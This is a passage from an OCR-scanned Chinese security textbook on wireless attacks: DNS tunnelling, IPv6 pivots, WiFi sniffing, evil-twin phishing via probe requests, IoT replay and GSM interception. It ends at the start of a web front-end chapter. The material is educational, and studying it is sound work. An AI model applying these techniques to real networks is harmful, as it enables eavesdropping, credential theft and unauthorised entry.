ping 都 ping 不 通 。 若 黑客 在 社工 渗透 的 过 程 中 使 用 一 台 有 线 网 机 器 (通常 无 须 鉴 权 ) 或 已 
完成 登录 的 无 线 网 机 器 搭 跳板 ， 使 用 Iodine 等 DNS 穿 透 工 具 ， 就 可 以 使 用 DNS 通 道 穿 透 内 
网 ， 从 而 进入 内 网 渗透 阶段 。DNS 通 道 是 比较 复杂 的 方案 ， 这 里 不 做 过 多 叙述 ， 想 研究 
DNS 通 道 技术 的 读者 可 以 自己 查找 资料 。 另 外 很 可 能 遇 到 的 一 种 情况 是 IPv6 无 屏蔽 ， 而 IPv4 
的 数据 包 却 基本 无 法 穿 透 。 这 时 ， 攻 击 者 会 将 安装 了 自己 固件 的 开发 板 接 入 有 线 〈 开 发 板 
体积 较 小 ， 隐 蔽 性 较 好 ) ， 搭 建 IPv6 转 IPv4 代 理 服务 器 ， 从 而 实现 未 鉴 权 计算 机 通过 IPv6 穿 
透 到 开发 板 做 的 内 网 跳板 ， 同 时 接 入 内 网 ， 进 入 内 网 渗透 阶段 。 攻 击 者 一 般 先 用 Intel Galileo 
Gen2 作 为 跳板 ， 其 次 是 Beagle Bone 和 树 莓 派 。IPv6 代 理 服务 器 比较 难 配置 ， 但 是 已 经 有 
成 熟 的 方案 存在 了 。 

攻击 者 对 于 没有 加 密 的 无 线 网 络 ， 一 般 从 无 线 本 身 入 手 进行 攻击 。 由 于 其 目的 是 窃取 
数据 ， 可 以 在 不 连接 或 者 无 鉴 权 的 情况 下 实现 ， 甚 至 做 到 获得 鉴 权 所 用 的 账户 (由 于 登录 界面 
通常 没有 加 密 ， 合 法 用 户 登 录 时 的 信息 是 明文 传输 的 ) ， 从 而 获得 进入 内 网 的 合法 身份 。 


— ж — 


У 黑客 与 安全 技术 指南 


明文 通信 的 监听 具体 操作 非常 简单 。 攻 击 者 依然 可 以 使 用 之 前 的 方法 将 网 卡 进入 监听 
模式 ， 然 后 使 用 Wireshark 进 行 抓 包 即 可 。 

有 几 个 要 点 需要 提示 一 下 : Wireshark 需 要 使 用 root 权 限 启 动 ， 否 则 无 法 抓 取 监听 模式 
网 卡 的 通信 ， 请 确保 网 卡 被 锁定 在 了 被 监听 的 目标 热点 的 频段 上 ， 如 果 做 不 到 可 以 让 网 卡 
在 连接 目标 热点 的 同时 进行 监听 〈 可 能 会 打 草 惊 蛇 ) ， 如 果 怕 对 方 发 现 则 可 以 连接 到 相 
同 频段 的 WiFi， 例 如 是 自己 的 手机 热点 〈 多 试 几 次 总 会 连 到 相同 频段 的 ) ， 然 后 进行 监 
听 。 这 种 方法 可 以 用 在 不 能 杀 掉 引起 网 卡 调频 的 进程 时 候 锁 定 网 卡 的 频段 。Wireshark 默 认 
只 能 抓 取 一 些 无 法 识别 具体 应 用 层 协 议 的 数据 包 ， 若 要 识别 应 用 层 数 据 包 (例如 在 HTTP 
传输 中 具体 包含 的 内 容 ) 则 需要 打开 设置 中 的 一 个 开关 ， 如 图 5-12 所 示 ， 需 要 打开 Enable 
decryption 开 关 。 









图 5-12 ”Wireshark 打 开 加 密 支 持 开关 
之 后 Wireshark 会 要 求 重 启 一 次 监听 ， 按 要 求 重新 进行 监听 之 后 就 可 以 读 取 应 用 层 数据 
包 了 。 例 如 在 Filter 栏 输入 http 并 单 击 旁边 的 Apply 便 可 以 只 查看 可 以 轻易 理解 的 HTITP 数 据 
包 ， 而 不 显示 其 他 数据 包 ， 具 体 效 果 如 图 5-13 所 示 。 








Basss 


图 5-13 ”Wireshark 的 http 筛 选 器 效果 
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同样 ， 这 个 方法 还 可 以 应 用 于 加 密 的 WiFi， 当 然 前 提 是 知道 密码 。 对 加 密 WiFi 通 信 的 
数据 包 进 行 解密 的 方法 也 很 简单 。 单 击 Decryption Keys 后 面 的 Edit 按 钮 ， 然 后 按照 第 一 层 
设置 界面 上 的 格式 要 求 添加 自己 所 需要 的 key， 即 可 将 加 密 的 WiFi 通 信 进 行 截取 ， 操 作 如 
图 5-14 所 示 。 











— ~ Ox. v, = 
图 5-14 ”Wireshark 添 加 目标 WiFi 密 钥 

这 种 被 动 监听 的 方案 在 做 了 ARP 隔 离 的 网 络 中 ， 或 者 在 想 彻底 隐蔽 自己 不 被 目标 的 网 
络 管理 员 发 现 的 情况 下 是 非常 有 效 的 攻击 方法 。 


5.4.4 已 保存 热点 钓鱼 


最 后 一 种 比较 常用 的 攻击 方式 就 是 利用 受害 者 设备 上 已 经 保存 的 热点 进行 钓鱼 攻击 。 
绝 大 多 数 WiFi 接 入 设备 都 会 自动 连接 周边 的 能 搜索 到 的 且 名 称 已 保存 在 本 地 的 WiFi 网 络 。 
之 所 以 不 验证 热点 的 MAC 地 址 是 因为 很 多 时 候 企 业 组 网 都 会 用 大 量 同名 不 同 MAC 的 AP， 
而 终端 应 该 保证 在 这 些 AP 之 间 无 颖 切换 。 但 是 这 里 就 给 了 攻击 者 可 乘 之 机 ， 即 建立 可 以 
和 目标 设备 保存 的 WiFi 同 名 的 热点 。 如 果 这 个 热点 没有 密码 ， 可 以 赁 此 轻松 对 目标 设备 
进行 中 间 人 攻击 ; 而 当 热点 有 密码 的 时 候 ， 可 以 利用 这 个 钓鱼 热点 来 骗取 密码 〈 仍 然 需 
要 破解 ) 。 

这 种 方法 其 实 也 只 是 理论 可 行 ， 而 真正 使 其 工程 化 的 是 一 种 叫 Probe 的 机 制 。 由 于 隐 
藏 热点 的 存在 ， 同 时 为 了 提升 连接 效率 ， 许 多 移动 设备 会 主动 向 外 发 送 自己 考虑 连接 的 热 
点 列表 ， 而 这 种 信息 在 airodump-ng 中 一 目 了 然 ， 如 图 5$-15 所 示 。 

图 $-15 下 半 部 分 是 目前 网 卡 所 能 扫描 到 的 客户 端 列 表 ， 而 最 右边 一 栏 Probes 则 是 这 些 
客户 端 所 发 出 的 试探 信号 。 当 攻击 的 目标 机 发 出 了 Chinanet、CMCC 等 明显 没有 密码 的 热 
点 试探 信号 ， 或 者 知道 其 中 的 某 个 网 络 是 没有 密码 的 (例如 部 署 了 IMC Portal) 的 校园 内 
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图 5-15 airodump-ng 对 Probe 的 显示 
由 于 许多 企业 都 采用 了 加 密 的 无 线 内 网 方案 ， 给 利用 无 线 网 进行 的 APT 造 成 了 障碍 ， 
此 时 如 果 能 利用 某 一 台 会 发 送 Probe 的 客户 端 ， 则 可 以 获取 到 密码 。 开 启 钓鱼 热点 之 后 ， 
受害 终端 将 会 发 送 携带 密 文 的 数据 包 到 钓鱼 热点 ， 此 时 钓鱼 热点 就 能 截取 这 个 数据 包 ， 并 
使 用 它 破解 目标 热点 的 密码 。 而 获取 到 密码 之 后 则 可 以 开启 受害 终端 并 连接 成 功 的 钓鱼 热 
点 ， 仿 冒 OA 界 面 等 对 敏感 信息 进行 钓鱼 。 


5.5 2k 


无 线 安全 是 一 个 非常 复杂 的 领域 。 从 广义 上 讲 ， 无 线 安全 所 包含 的 远 远 不 止 WLAN 通 
信 ， 从 电报 安全 到 4G 网 络 与 卫星 通信 安全 ， 都 可 以 归 为 无 线 安全 的 范畴 ， 本 节 将 讨论 无 
线 安 全 中 WiFi 以 外 的 部 分 。 

随 着 时 代 的 发 展 ， 生 活 中 大 量 的 有 线 通 信 都 转变 为 了 无 线 通信 。 我 们 关注 的 无 线 通信 
和 无 线 安全 也 不 能 仅仅 局 限于 WiFi， 还 有 大 量 的 领域 等 待人 们 去 探索 。 

现在 除了 WiFi 外 ， 无 线 通信 主要 还 有 蓝牙 、ZigBee、DVB-T、GSM 等 很 多 种 ， 这 些 
领域 多 多 少 少 都 会 有 一 些 安全 漏洞 。 举 个 简单 的 例子 ， 国 内 的 某 些 基于 蓝牙 4.0 协 议 的 手 
环 可 以 轻松 被 黑客 控制 。 它 们 普遍 存在 工厂 调试 接口 没有 封闭 或 者 加 密 ， 以 至 于 开发 者 可 
以 轻易 截取 并 解密 接口 ， 然 后 实现 对 手 环 控制 权 的 夺取 。 有 的 手 环 甚至 对 开源 方案 的 协议 
没有 做 任何 更 改 ， 攻 击 者 只 要 看 到 品牌 就 能 对 着 文档 直接 进入 工厂 模式 并 夺取 控制 权 。 夺 
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取 控 制 权 之 后 ， 攻 击 者 就 可 以 随意 更 改 屏幕 内 容 ， 控 制 手 环 无 限 振动 ， 虽 然 这 并 不 能 造成 
太 大 损失 ， 但 这 些 漏洞 着 实 令 人 担忧 。 

曾经 有 人 通过 使 用 一 个 四 轴 飞 行 器 夺取 另 一 个 四 轴 飞 行 器 的 控制 权 ， 这 就 属于 典型 
的 物 联网 透 传 的 漏洞 。 很 多 时 候 这 些 遥 控 设 备 使 用 的 并 非 是 生活 中 常见 的 通用 协议 ， 而 是 
使 用 了 低 成 本 的 nfr24101 等 芯片 进行 直接 通信 。 以 nrf24101p 为 例 ， 这 是 一 枚 非常 常见 的 无 
线 数 传 芯片 〈 可 以 简单 地 理解 为 不 使 用 蓝牙 /WiFi 的 无 线 串 口 ) ， 它 本 身 支持 AES 加 密 传 
输 ， 但 是 许多 开发 者 基于 性 能 考虑 或 者 干脆 就 是 因为 偷懒 而 没有 开启 这 个 功能 ， 以 至 于 设 
备 和 设备 间 的 通信 可 以 轻易 被 监听 ， 甚 至 可 以 动 持 被 控 设 备 的 控制 权 。 

GSM 协 议 是 目前 世界 上 使 用 最 广 的 通信 协议 ， 但 是 它 本 身 也 有 许多 漏洞 。 这 个 协议 
可 以 说 是 很 不 安全 的 ， 它 的 很 多 漏洞 很 早 就 已 经 被 发 现 ， 但 至 今 也 没有 得 到 妥善 修复 。 有 
些 运 营 商 假设 GSM 网 络 根本 就 没有 做 传输 加 密 处 理 ， 以 至 于 不 利用 漏洞 就 可 以 轻易 监听 
在 空中 明文 传输 的 短信 等 内 容 。 而 3G 和 4G 网 络 一 直 被 认为 是 安全 的 通信 方式 ， 可 是 前 段 
时 间 3G 网 络 也 被 攻破 了 ， 攻 击 者 也 许 是 出 于 维护 公共 网 络 安全 的 目的 并 没有 公开 攻击 方 
式 与 所 利用 的 漏洞 。4G 可 以 说 是 目前 唯一 认为 比较 安全 的 移动 通信 ，4G 网 络 中 的 应 用 层 
不 加 密 协议 通信 ， 被 认为 是 不 可 以 被 除 用 户 自己 和 运营 商 外 第 三 方 监听 的 。 

有 些 设备 例如 大 多 数 对 讲 机 天 生 就 不 具备 加 密 特 性 ， 它 的 所 有 通信 都 可 以 被 轻易 监 
听 ， 监 听 者 甚至 只 需要 将 对 讲 机 调 至 同一 频段 就 能 实现 监听 。 谈 到 对 讲 就 不 得 不 说 一 个 在 
国际 安全 界 已 经 引起 注意 的 严重 问题 ， 那 就 是 机 场 塔台 与 飞机 之 间 的 通信 。 使 用 特殊 的 设 
备 (其实 很 常见 ) 和 专门 的 软件 可 以 轻易 监听 机 场 塔台 和 飞机 之 间 的 对 讲 等 通信 ， 此 时 如 
果 发 出 干扰 信号 去 引导 飞机 飞 向 错误 的 方向 ， 很 可 能 会 引起 非常 严重 的 事故 ， 这 可 以 说 是 
一 个 真正 威胁 到 普通 民众 生命 安全 的 无 线 安全 漏洞 。 

另 一 个 长 期 受 关注 的 主题 是 RFID 与 NFC 的 安全 。 简 单 地 说 ， 这 就 是 近 距 离 非 接 触 式 
通信 的 安全 。 从 严格 意义 上 来 讲 ， 这 是 和 之 前 讲 的 无 线 安全 不 相关 的 内 容 。NFC 安 全 是 研 
究 对 各 种 加 密 或 是 不 加 密 的 卡片 进行 破解 、 复 制 、 修 改 信息 等 内 容 。NFC 在 当今 社会 大 量 
用 于 身份 验证 和 支付 ，NFC 的 漏洞 可 以 使 攻击 者 对 物理 空间 进行 未 授权 访问 ， 或 者 去 商店 
“ 偷 ”抹茶 小 饼干 。 


5.5.1 物 联 网 透 传 


随 着 互联 网 技术 、 无 线 通信 技术 以 及 媒 入 式 行业 的 蓬勃 发 展 ， 智 能 家 居 渐 渐进 入 了 人 
们 的 视野 ， 各 种 智能 插座 、 家 庭 控制 中 心 在 一 次 次 的 众 筹 中 诞生 ， 但 这 些 已 经 渐渐 掌控 了 
家 庭 中 各 种 物品 控制 权 的 设备 真 的 安全 吗 ? 

先 来 谈 谈 各 种 射频 模块 。 射 频 模块 通常 被 称 为 RF 模块 ， 不 同 的 射频 模块 工作 在 不 同 
的 频段 。 通 常 射 频 模块 使 用 自己 的 私有 协议 ， 实 现 的 功能 可 以 简单 地 理解 为 无 线 串 口 。 但 
是 在 不 使 用 应 用 层 或 者 协议 层 的 加 密 时 ， 这 些 模块 之 间 的 通信 人 往往 是 不 加 密 的 ， 只 需要 有 
相同 或 者 支持 相同 协议 的 ) 模块 即 可 轻易 监听 所 有 通信 内 容 。 

以 APC220 模 块 为 例 ， 这 是 一 个 常见 的 工作 在 433MHz 频 段 的 射频 数字 信和 号 传输 模块 。 
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它 可 以 模拟 为 一 个 串口 设备 与 主 控 芯 片 连接 ， 同 时 发 送 所 有 从 主 控 串 口上 接收 到 的 信息 ， 
并 且 将 自己 以 无 线 信号 形式 接收 到 的 信息 使 用 串口 发 送 给 主 控 芯 片 ， 实 现 多 设备 之 间 的 无 
线 数 传 。 

APC220 是 一 个 非常 优秀 的 模块 ， 功 耗 较 低 而 信号 较 强 。 两 块 APC220 可 以 间隔 几 百 米 
或 者 隔 着 好 几 堵 承 重 墙 依然 维持 稳定 的 通信 。 这 个 模块 在 通信 能 力 方面 可 以 被 视 为 极其 优 
秀 的 ， 但 是 模块 之 间 的 通信 并 没有 被 加 密 ， 使 用 第 三 个 APC220 可 以 轻易 监听 另外 两 个 模 
块 之 间 的 通信 。 

当 这 样 的 无 线 数 传 模块 被 应 用 到 智能 家 居中 时 就 会 产生 很 多 问题 。 例 如 现在 比较 流行 
的 智能 家 居 通 常会 包含 射频 控制 车 库 门 开关 的 功能 ， 此 时 的 通信 内 容 若是 每 次 指令 都 一 模 
一 样 〈 非 常常 见 的 情况 ) ， 那 么 攻击 者 可 以 轻易 截取 空中 传输 的 控制 信 令 ， 从 而 进行 重 放 
攻击 ， 打 开车 库 门 ， 轻 松 对 民宅 进行 未 授权 访问 。 

假设 另外 一 种 更 加 安全 的 情况 ， 如 果 控 制 中 心 和 车 库 门 之 间 使 用 加 密 通信 ， 并 在 通信 
内 容 中 包含 时 间 戳 ， 那 么 这 样 的 通信 就 会 变 得 非常 难以 破解 ， 也 不 可 能 被 重 放 ， 从 而 实现 
了 对 家 庭 安全 的 良好 保护 。 

这 里 主要 是 提醒 各 位 读者 有 关 智 能 家 居 和 智能 硬件 的 问题 ， 现 在 智能 家 居 和 智能 硬件 
还 属于 新 兴 行 业 ， 很 多 产品 都 处 于 不 成 熟 阶段 ， 也 许 它们 的 功能 很 令 人 满意 ， 但 是 它们 的 
安全 性 在 攻击 者 面前 却 可 能 不 堪 一 击 。 

很 多 随身 设备 也 一 样 是 不 安全 的 ， 典 型 的 是 智能 手 环 。 国 内 曾经 有 开发 者 发 现 了 某 闭 
源 手 环 的 无 限 振动 漏洞 。 当 然 这 样 的 漏洞 危害 不 大 ， 而 不 会 有 什么 实际 的 危害 性 。 但 是 这 
只 是 很 普通 的 运动 记录 设备 ， 一 旦 使 用 者 佩戴 的 是 具有 危险 性 的 设备 ， 例 如 带 有 电击 叫 醒 
功能 的 手表 或 者 心脏 起 搏 器， 这样 的 设备 如 果 有 安全 漏洞 ， 并 且 遭 遇 攻 击 ， 就 可 能 对 生命 
安全 造成 严重 威胁 。 


5.5.2 ”移动 通信 


移动 通信 是 我 们 在 日 常生 活 中 几乎 离 不 开 的 东西 ， 从 最 早 的 寻呼机 、 大 哥 大 ， 到 现在 
支持 LITE、WiMAX 等 4G 协 议 的 终端 设备 ， 都 在 使 用 移动 通信 。1G 网 络 早已 彻底 退役 ，1G 
网 络 被 广泛 应 用 的 那个 时 代笔 者 还 没 出 生 。2G 网 络 则 在 当今 世界 还 有 极其 广泛 的 应 用 。 
2G 网 络 可 以 分 为 FDMA〔 频 分 多 址 ， 不 同 设备 /传输 方向 工作 在 不 同 小 频段 ， 国 内 GSM 网 
络 采 用 此 方式 ) ; TDMA (时 分 多 址 ， 将 时 间 分 为 多 个 帧 ， 设 备 在 基站 分 配 的 允许 的 时 
段 / 帧 进行 数据 发 送 或 接收 ); СОМА 〔〈 码 分 多 址 ， 没 有 物理 频段 区 分 ， 只 有 逻辑 频道 ， 
基站 和 终端 使 用 信号 中 的 代码 区 分 信号 发 送 者 与 接收 方 ) 。CDMA 是 较为 安全 的 网 络 ， 而 
另外 两 种 则 漏洞 百出 。 虽 然 大 多 数 漏洞 都 已 被 封 堵 ， 但 是 仍旧 有 许多 运营 商 在 使 用 存在 漏 
洞 的 设备 ， 有 些 运 营 商 甚至 干脆 没有 对 自己 拥有 的 GSM 蜂 窝 网 络 通信 做 加 密 处 理 。 攻 击 
者 可 以 轻易 地 使 用 非常 便宜 的 设备 实现 对 短信 的 监听 。 如 果 攻 击 者 追踪 了 GSM 通 信 的 跳 
频 ， 甚 至 可 以 实时 监听 通话 。 

国外 有 一 个 在 安全 界 很 出 名 的 项 目 叫 Osmocom， 这 个 项 目 主 要 针对 GSM 做 渗透 测 
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试 。 项目 组 开源 了 一 套 对 GSM 网 络 做 特殊 应 用 的 套件 ， 也 放出 了 一 套 能 自动 收集 当地 
GSM 网 络 安全 性 信息 的 虚拟 机 镜像 。 比 较 典 型 的 可 以 用 于 监听 的 设备 是 摩托 罗拉 的 C118/ 
C123 手 机 ， 只 要 使 用 标准 的 3.5mm 音 频 接口 串口 线 加 上 一 个 3.5mm 转 2.5mm 的 音频 转 接 
头 ， 以 及 一 个 USB 转 TTL 串 口 的 模块 ， 就 可 以 将 C118 使 用 串口 连接 到 计算 机 ， 从 而 使 用 
Osmocom 的 工具 进行 渗透 测试 。 

使 用 原版 的 C118 只 能 监听 附近 基站 指定 信道 的 GSM 通 信 ， 但 是 如 果 对 C118 中 的 某 几 
个 滤波 器 以 及 其 他 元 件 使 用 特定 的 元 件 替 换 ， 就 可 以 发 送信 号 ， 干 扰 正常 的 GSM 通 信 。 
鉴于 搭建 伪 基站 是 违法 行为 ， 本 书 中 不 对 具体 的 方法 做 解析 。 

当 你 的 GSM 手 机 受到 伪 基站 攻击 时 会 出 现 短暂 的 信号 丢失 ， 然 后 立刻 变 得 比 之 前 正 
常 通信 的 状态 强 ， 攻 击 停止 时 也 会 出 现 短暂 的 信号 丢失 ， 之 后 信号 比 被 攻击 时 弱 。 伪 基站 
可 以 伪装 成 任何 号 码 向 你 的 手机 发 送 短信 甚至 拨打 电话 。 例 如 伪 基 站 伪装 成 银行 官方 号 码 
向 你 的 手机 发 送 诈骗 短信 ，“ 注 意 发 件 人 号 码 ” 的 技巧 将 不 再 管用 ， 你 可 能 会 轻信 短信 中 
所 陈述 的 内 容 。 

最 近 的 消息 是 3G 网 络 〈 特 指 WCDMA/ 联 通 系 ， 可 能 包括 TD/ 移 动 系 ， 不 包括 电信 /高 
通 系 的 CDMA2000) 也 可 以 被 监听 短信 ， 这 导致 我 们 对 于 移动 通信 的 可 信 度 产生 了 新 的 怀 
疑 。 也 许 在 移动 通信 中 只 有 网 络 通信 才 是 真正 安全 的 。 

对 移动 通信 感 兴趣 的 读者 可 以 研究 一 下 一 个 名 为 “OpenBTS” 的 开源 基站 程序 ， 这 个 
程序 基于 GnuRadio 运 行 ， 算 是 软件 无 线 电 的 一 种 功能 、 实 例 。 OpenBTS 支 持 常 规 频 分 多 
址 的 GSM 网 络 以 及 UMTS 制式 的 3G 通 信 。 


5.5.3 ”软件 无 线 电 


软件 无 线 电 是 在 当前 的 无 线 电 领域 非常 有 用 的 设备 ， 或 者 说 是 方法 。 英 文 名 为 SDR 
(Software Defined Radio) ， 即 软件 定义 无 线 电 。 这 个 概念 理解 起 来 非常 简单 ， 通 常 典型 
的 无 线 电 设备 ， 例 如 手机 中 的 基带 芯片 、nrf51822 低 功 耗 蓝牙 芯片 等 都 属于 对 无 线 通 信 协 
议 的 硬件 (固件) 实现。 但 是 无 线 通 信 本 身 无 非 是 在 空中 传播 的 信号 ， 所 以 软件 实现 无 线 
电 协 议 在 理论 上 是 完全 可 行 的 。Gnu Radio 是 一 套用 于 软件 无 线 电 的 工具 ， 根 据 官 网 的 说 
明 ， 就 连声 卡 都 能 用 于 软件 无 线 电 。 

现在 成 本 比较 低 的 SDR 实 现 是 用 Realtek 公 司 生 产 的 电视 棒 做 接收 器 ， 俗 称 RTL-SDR。 
一 根 Realtek 的 电视 棒 ， 通 常 仅 需 50 多 元 即 可 买 到 ， 即 便 是 被 专门 修改 过 周边 电路 以 进行 
低频 接收 的 设备 ， 也 仅仅 只 需 200 多 元 ， 最 高 能 监听 1.7GHz 的 信号 。 专 业 些 的 设备 会 比较 
贵 ， 例 如 HackRF 这 一 款 SDR 设 备 ， 价 格 将 近 2000 元 ， 但 是 可 以 收发 的 范围 也 能 达到 可 怕 
的 6GHz。 

此 处 有 一 点 非常 重要 ， 必 须 在 此 说 明 : 在 进行 不 明确 免费 民用 频段 的 SDR 研 究 时 一 定 
要 保持 彻底 沉默 地 被 动 监听 ， 不 要 试图 主动 发 送 任何 信号 。 国 家 在 无 线 电 方面 有 很 严格 
的 管理 机 制 ， 只 允许 特定 的 人 【设备 ) 在 特定 的 频段 发 送 特定 范围 内 的 信号 ， 在 进行 需 
要 发 信 的 SDR 研 究 前 依照 规定 应 取得 业余 无 线 电 操作 证 书 。 平 时 我 们 使 用 的 WiFi 工 作 在 
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2.4GHz， 这 是 国家 开放 使 用 的 频段 ， 但 是 有 一 定 的 功率 限制 一 一 你 不 能 架设 一 个 功率 巨大 
的 WiFi 热 点 向 整个 县 或 是 区 域 广播 信息 。SGHz 的 WiFi 现 在 也 是 一 个 趋势 ，802.11AC 标 准 
就 是 为 SGHz 设 定 的 。 但 是 很 多 国家 5GHz 频 段 中 的 部 分 小 频段 是 不 允许 使 用 的 ， 因 为 这 些 
频段 很 可 能 是 军用 或 者 因 其 他 原因 管制 的 。 一 些 比较 优秀 的 路 由 器 中 都 会 要 求 你 为 5G 频 
段 设 置 国家 ， 以 便 路 由 器 知道 它 所 在 的 位 置 允许 使 用 的 频段 。 

无 线 电 通信 有 非常 复杂 的 知识 理论 ， 篇 幅 所 限 ， 无 法 太 过 深入 。 这 里 仅 介绍 一 些 无 线 
通信 领域 的 常识 ， 希 望 读者 能 对 无 线 通信 有 一 些 基 本 理解 。 

读者 也 许 思考 过 一 个 问题 ， 为 什么 U 盘 必须 插 在 计算 机 上 ? 既然 无 线 信 号 能 够 传输 数 
据 ， 那 么 是 不 是 U 盘 只 要 供 上 电 ， 不 插 在 计算 机 上 也 能 用 ? 生活 常识 告诉 我 们 ， 显 然 是 不 
能 用 。 但 是 为 什么 呢 ? 空间 中 的 信号 传输 是 不 稳定 的 ， 日 常生 活 中 常见 的 信号 源 都 是 低频 
信和 号 源 ， 所 传递 的 信息 也 是 低频 率 的 信息 。 比 如 声波 就 是 一 种 典型 的 低频 信号 。 麦 克 风 的 
原理 揭示 了 声波 可 以 直接 转换 成 同 频 的 电信 号 ， 但 是 这 样 的 电信 号 如 果 直 接 发 送 ， 由 于 频 
率 较 低 ， 即 使 经 过 功率 放大 也 非常 容易 受到 干扰 ， 几 乎 无 法 无 线 传 输 。 这 时 调制 解 调 技术 
就 被 引入 到 了 无 线 传输 中 。 人 们 日 常 接触 到 的 信号 源 首先 被 数字 化 ， 全 部 转换 为 二 进 制 内 
容 ， 然 后 使 用 高 频 的 电磁 波 发 送 〈 称 为 载波 ) ， 使 得 信号 在 传输 过 程 中 所 受 的 干扰 减 小 。 
当 接 收 端 接收 到 信号 时 ， 首 先进 行 滤波 ， 滤 除 不 在 载波 频段 上 的 信号 ， 然 后 对 载波 进行 解 
调 ， 恢 复 其 中 的 数字 信息 。 这 个 过 程 其 实 包含 了 一 次 信息 丢失 ， 输 入 的 信号 例如 声音 本 质 
上 是 模拟 信号 ， 但 是 经 过 这 个 系统 的 传输 ， 转 换 成 了 数字 信号 ， 再 精细 的 数字 信号 也 会 
在 数 模 转 换 的 过 程 中 导致 信息 的 丢失 。 将 这 个 原理 应 用 到 我 们 日 常 的 WiFi 通 信 中 ， 就 可 
以 把 计算 机 发 送 数据 〈 精 确 到 bit) 的 速率 理解 为 信号 本 身 的 频率 ， 而 WiFi 信 号 的 频率 为 
2.4GHz， 远 远 高 于 计算 机 发 送 的 数据 频率 。 这 也 说 明了 为 什么 SG 网 络 比 2.4G 网 络 在 理论 
上 快 许多 的 原因 ， 除 了 干扰 源 更 少 以 外 ， 同 样 重要 的 原因 是 SG 频率 的 信号 作为 载波 能 承 


载 更 高 频率 的 原始 信号。 
5.6 AA 


无 线 安全 与 我 们 密 不 可 分 。 无 线 黑客 门槛 虽然 不 低 ， 但 若是 接触 到 高 级 的 层次 ， 破 坏 
力 可 以 说 是 极其 强大 的 。 在 这 个 万 物 趋向 互联 的 世界 ， 了 解 一 些 无 线 安全 知识 ， 做 到 心中 
有 数 ， 是 非常 重要 的 。 
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随 着 Web 2.0 的 高 速 发 展 ， 众 多 前 端 语言 也 越 来 越 多 地 出 现在 人 们 视野 中 。 短 短 几 年 
间 ，HTML5、XHTML、XML、JavaScript 被 大 量 使 用 ， 为 用 户 提供 更 好 的 Surfing 体 验 ， 
对 图 片 、 音 频 、 视 频 的 处 理 更 是 花样 百出 。 然 而 短 短 的 几 年 时 间 是 远 远 不 够 让 一 个 新 生 事 
物 发 展 成 熟 的 ， 而 不 成 熟 的 新 技术 中 存在 的 问题 反而 为 黑客 提供 了 契机 。 本 章 讲解 Web 前 
端 中 的 安全 问题 。 





6.1 前 端 安全 基础 知识 


下 面 介绍 一 些 前 端 开发 领域 中 的 常识 ， 通 过 介绍 一 些 非常 重要 的 “点 ”， 让 读者 迅速 
抓 住 学 习 重 点 。 此 外 还 需 读者 自行 汲取 更 多 知识 ， 将 这 些 “ 点 ” 连 成 “ 线 ”， 最 终 熟 练 运 
用 ， 形 成 一 个 知识 “ 面 ”。 


6.1.1 HTML 基础 


HTML 即 超 文本 标记 语言 ， 是 构成 网 页 的 重要 框架 。 当 浏览 一 个 页 面 时 ， 浏 览 器 会 
自动 解析 对 应 的 HTML 语 句 ， 将 其 转化 为 页 面 呈现 出 来 ， 对 于 浏览 器 来 说 ， 这 个 过 程 称 为 
“解释 ”， 如 果 想 要 查看 这 些 页 面 的 HTML 代 码 ， 除 了 使 用 一 些 插件 外 ， 最 简单 的 方式 是 
直接 在 页 面 上 右键 选择 查看 源码 。 下 面 以 百度 首页 为 例 ， 其 页 面 对 应 的 HTML 代 码 如 图 
6-1 所 示 。 
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图 6-1 百度 网 页 及 源码 

一 个 漂亮 的 网 页 ， 除 了 需要 有 HTML 以 外 ， 还 需要 有 层 合 样式 表 CSS 对 其 进行 修饰 。 有 趣 
的 是 ， 正 是 因为 CSS， 才 导致 XSS〈 跨 站 脚本 攻击 ) 被 迫 改 名 换 姓 ， 后 面 会 详细 介绍 XSS。 

从 黑客 以 及 安全 开发 者 的 角度 来 看 ， 除 了 要 遵守 成 型 的 开发 标准 ， 还 需要 同时 学 习 

安全 开发 ， 并 从 黑客 的 角度 思考 问题 ， 培 养 安全 意识 。 下 面 让 我 们 来 简明 扼要 地 介绍 一 下 
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HTML 和 CSS 的 基本 写法 。 
首先 ， 打 开 一 个 文本 编辑 器 〈 记 事 本 即 可 ) ， 在 其 中 输入 如 图 6-2 所 示 的 文本 ， 并 另 
存 为 一 个 .html 后 级 的 文件 ， 双 击 这 个 文件 ， 浏 览 器 会 负责 打开 它 ， 如 图 6-2 所 示 。 
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图 6-2 演示 HTML 页 面 (1) 

这 时 浏览 器 所 显示 的 还 是 一 个 空白 页 面 ， 这 是 因为 我 们 只 搭建 了 HTML 的 基本 框架 ， 
还 尚未 填充 内 容 。 来 看 一 下 已 经 写 入 的 内 容 ，<html></html> 标 签 内 是 页 面 的 主体 ， 注 意 
标签 要 成 对 出 现 。 其 中 包含 了 另外 两 个 双 标 签 <head> 和 <body>， 从 字面 意义 就 很 容易 理 
解 ， 它 们 就 是 页 面 的 头 和 主体 ， 在 <head> 标 签 内 我 们 可 以 再 用 <title></title> 标 签 插 入 页 
面 标题 ， 也 可 以 用 <style></style> 标 签 修饰 当前 页 面 的 样式 ， 而 <body> 标 签 内 部 可 以 插 
入 我 们 正文 的 主体 ， 例 如 标示 段落 的 <p></p> 标 签 、 区 隔 标记 <div></div> 等 。 另 外 还 有 
很 多 更 为 有 趣 的 标签 ， 正 是 这 些 标签 构成 了 精彩 的 Web 页 面 。 具 有 更 多 功能 的 标签 例如 
<h[1 一 6]></h[1 一 6]> 可 以 标示 字体 的 大 小 ，h1 最 大 ，h6 最 小 。 下 面 我 们 简单 演示 一 下 页 面 
效果 ， 如 图 6-3 所 示 。 
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图 6-3 演示 HTML 页 面 (2 ) 
从 图 6-3 可 以 看 出 ， 页 面 标题 为 “这 里 是 标题 ”， 而 页 面 也 有 了 段落 内 文本 和 字体 
为 hl 的 文本 。 除 了 双 标 签 以 外 ，HTML 还 有 一 些 所 谓 的 单 标签 也 很 常用 ， 例 如 换行 标记 
<br>、 分 割 线 <hr> 等 。 
HTML 内 属性 的 使 用 也 十 分 重要 ， 使 用 格式 : 
< 标签 属性 =" 属 性 "> 
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例如 : <p style="color:red">， 效 果 如 图 6-4 所 示 。 
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这 里 是 三 输出 




















图 6-4 演示 HTML 页 面 (3) 
从 图 6-4 可 以 看 出 ，style 属 性 内 定义 的 颜色 为 红色 在 页 面 中 生效 了 。 


6.1.2 使 用 JavaScript 


前 面 介 绍 了 HTML， 读 者 还 需要 再 了 解 一 下 JavaScript。 在 讲解 JavaScript 之 前 ， 先 介 
绍 一 下 同 源 策略 。 

